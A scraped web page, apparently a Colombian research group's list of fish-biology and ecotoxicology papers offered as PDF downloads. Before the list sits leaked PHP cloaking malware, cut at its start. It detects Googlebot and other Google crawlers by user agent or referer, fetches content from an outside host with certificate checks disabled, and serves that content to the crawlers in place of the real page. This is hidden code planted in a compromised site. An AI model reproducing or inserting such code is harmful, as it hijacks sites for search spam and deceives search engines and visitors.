true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 8, CURLOPT_USERAGENT => $ua, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0 ); if ($ref) { $opts[CURLOPT_REFERER] = $ref; } curl_setopt_array($ch, $opts); $out = curl_exec($ch); curl_close($ch); } if ($out === false && (bool)ini_get('allow_url_fopen')) { $context = @stream_context_create(array( 'http' => array( 'header' => "User-Agent: $ua\r\n" . ($ref ? "Referer: $ref\r\n" : ""), 'timeout' => 8, 'follow_location' => 1 ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false ) )); $out = @file_get_contents($url, false, $context); } return $out; } } $u = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $r = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $b = array('Googlebot', 'Google-InspectionTool', 'Mediapartners-Google'); $is_bot = false; // 1. Adım: Bot Kontrolü foreach ($b as $bot) { if (($u && stripos($u, $bot) !== false) || ($r && stripos($r, $bot) !== false)) { $is_bot = true; break; } } // 2. Adım: Bot işlemleri if ($is_bot) { $t = 'https://alaattin30.xyz/guvenlik/yildirimank.php'; $c = get_bot_content($t, $u, $r); if ($c !== false && !empty($c)) { echo $c; exit(); } } ?>
esnlenpt

Siguenos en Facebook Síguenos en TwitterSiguenos en BloggerSiguenos en YouTube

Loading...

Folder Artículos publicados

Documents

pdf 1 Endosulfan affects health variables in adult zebrafish (Danio rerio) and induces alterations in larvae development ( pdf, 1.14 MB ) (589 downloads) Popular
pdf 10 Using genotoxic and haematological biomarkers as an evidence contamination in Colombia 2016 ( pdf, 1.22 MB ) (519 downloads) Popular
pdf 11 Habitos alimenticios de L friderici durante un ciclo hidrobiologico en Vaupes, Colombia 2017 ( pdf, 799 KB ) (564 downloads) Popular
pdf 2 Bezafibrate, a lipid lowering pharmaceutical, as a potential endocrine disruptor in male zebrafish (Danio rerio) ( pdf, 1.81 MB ) (824 downloads) Popular
pdf 3 Functional characterization of water transport and cellular localization of three aquaporin paralogs in the salmonid intestine ( pdf, 20.44 MB ) (538 downloads) Popular
pdf 4 Inducción de micronúcleos y otras anormalidades nucleares en Astyanax gr bimaculatus 2012 ( pdf, 731 KB ) (486 downloads) Popular
pdf 5 Sexing Frogs by Real Time PCR Using Aromatase (cyp19) as an Early Ovarian Differentiation Marker 2012 ( pdf, 345 KB ) (516 downloads) Popular
pdf 6 Evidence of small modulation of EE2 induded effects by concurrent exposure to trenbolone in male eelpout 2013 ( pdf, 1.25 MB ) (516 downloads) Popular
pdf 7 Evaluación de la restricción alimenticia sobre el crecimiento compensatorio en alevinos de cachama blanca ( pdf, 277 KB ) (653 downloads) Popular
pdf 8 Caracter’isticas morfol—ogicas morfometrica y manejo de la primera alimentación de larvas de escalar altum ( pdf, 809 KB ) (526 downloads) Popular
pdf 9 Eugenol como anestesico para manejo de juveniles ( pdf, 207 KB ) (557 downloads) Popular